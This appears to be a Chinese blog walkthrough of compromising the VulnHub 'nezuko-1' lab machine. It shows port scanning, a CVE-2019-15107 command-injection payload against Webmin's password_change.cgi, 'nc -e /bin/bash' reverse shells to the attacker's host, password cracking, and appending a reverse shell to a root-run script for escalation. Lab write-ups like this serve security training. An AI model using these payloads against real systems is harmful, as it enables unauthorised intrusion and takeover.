nezuko-1打靶记录
一、环境搭建
靶机镜像下载地址:https://www.vulnhub.com/entry/nezuko-1%2C352/
然后设置虚拟机名和存储位置
设置网络适配器为nat模式
然后启动虚拟机就可以了。
二、信息收集
发现存活主机
我们可以得到目标靶机的ip是192.168.113.130
端口扫描
1 | nmap -sV 192.168.113.130 |
可以看到目标靶机开放了22(ssh)端口和80(web)端口
三、漏洞挖掘与利用
访问靶机对应的web服务
使用dirsearch扫描靶机的目录
可以看到有一个robots.txt文件和一个sqmple路由
访问robots.txt 文件
1 | NBUW45BAMZZG63JANZSXU5LLN4QDUIDUNBUXGIDJOMQG433UEB2GQZJAOJUWO2DUEBYG64TUEB2G6IDFNZ2W2ZLSMF2GKIC6O5PA==== |
是一段编码的字符串
进行base32解码
发现是给了一个提示:告诉我们这不是枚举的正确端口
访问扫描出来的另一个路由
有一个txt文件里面啥也没有
提示告诉我们端口不对,那么说明我们端口扫描不完全
重新扫描端口
1 | nmap -A -T4 -O -p 0-65535 192.168.113.130 |
可以看到还开放了一个13337端口对应也是web服务
访问这个端口的服务
这里注意要使用https访问
可以看到是一个后台管理登录系统
尝试弱口令爆破
爆破失败,尝试了常见的几个弱口令也没有成功
然后尝试去搜索这个管理系统的历史漏洞
然后搜索到一个CVE-2019-15107是一个远程命令执行漏洞
文章链接:https://blog.csdn.net/qq_24481913/article/details/132043461
尝试进行cve漏洞利用
漏洞利用点在password_change.cgi路由
在重置密码这个路由存在一个代码执行漏洞
paylaod:
1 | user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2 |
尝试反弹shell
1 | user=rootxx&pam=&expired=2&old=test|nc -e /bin/bash 192.168.113.129 4321&new1=test2&new2=test2 |
kali开启监听4321端口
反弹成功
进入交互模式
1 | python -c "import pty;pty.spawn('/bin/bash')" |
进入全交互模式失败
四、提权
我们现在只是一个普通用户权限,要想拿下这台服务器就要提升权限
提权最常用的就是suid提权
首先就是查找有s权限的命令
1 | find / -user root -perm -4000 -print 2>/dev/null |
没有常见的suid提权使用的命令
那么这种方法就不能使用了
这里尝试读取一下/etc/passwd
可以看到zenitsu用户的密码以加密的形式存放在这里
使用john进行解密
解开这个用户的密码是meowmeow
尝试切换用户提权
但是想要使用su命令要切换成全交互式shell
我们这里可以先尝试使用ssh连接
但是连接失败,那就只能尝试切换成全交互式shell
查看靶机安装的python版本
1 | which python python2 python3 |
安装的是python3,这也就是我们刚才用python提升失败的原因
那只用用python3来提升交互模式就行
1 | python3 -c 'import pty;pty.spawn("/bin/bash")'; |
使用su切换到zenitsu用户
切换用户成功
但是并不是root权限
然后再/home/zenitsu/to_nezuko下找到一个有root权限的文件
那么它可以以root权限运行,那我们可以使用它进行反弹shell
尝试写入
1 | echo "nc -e /bin/bash 192.168.113.129 4321" > send_message_to_nezuko.sh |
但是写入失败了
用lsattr命令可以查看隐藏权限
chattr +a file使file文件只能追加内容,不能删除、重命名,因此可以直接追加内容
查看文件内容
可以看到反弹shell的代码写入成功了
然后运行sh文件反弹shell
kali开启监听
可以看到已经成功拿下这台服务器
- 标题: nezuko-1打靶记录
- 作者: GTL-JU
- 创建于: 2023-10-17 22:12:46
- 更新于: 2023-10-17 22:20:39
- 链接: https://gtl-ju.github.io/2023/10/17/nezuko-1打靶记录/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。